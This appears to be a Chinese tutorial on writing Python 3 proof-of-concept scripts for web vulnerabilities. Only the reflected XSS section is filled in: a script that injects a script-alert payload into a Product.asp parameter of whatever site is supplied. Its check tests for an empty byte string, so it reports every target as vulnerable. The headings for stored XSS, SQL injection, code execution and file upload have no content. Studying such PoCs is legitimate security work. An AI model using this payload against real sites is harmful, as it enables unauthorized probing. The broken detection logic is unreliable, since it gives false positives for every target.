python3编写不同类型漏洞的poc

python2 与python3使用的模块略有不同

1、反射型xss的poc，以骑士cms的反射型xss为例

# coding=utf-8

from urllib import request
import sys 
# https://blog.csdn.net/jiduochou963/article/details/87564467 
# http://www.onescorpion.com/research/poc.html
def xss_poc(url):
    target = url + r"/Product.asp?BigClassName=%C4%A5%BB%FA%3Cscript%3Ealert(1)%3C/script%3E&Smallclassname=%C1%A2%C4%A5"
    try:
        req = request.Request(target) # 发送请求
        result = request.urlopen(req).read()
        if b'' in result:
            print("%s is vulnerable!" % url)
            print("payload:\n",target)
        else:
            print("%s is not vulnerable!"% url)
    except Exception as e:
        print('something is wrong..')
        print(e)

argvs = sys.argv
if len(argvs) == 2:
    url = argvs[1]
else:
    print('unsage: python %s url'% argvs[0])
xss_poc(url)

 poc验证结果：

2、存储型xss的poc

3、get方式SQL注入

4、post方式SQL注入

5、代码执行

6、文件上传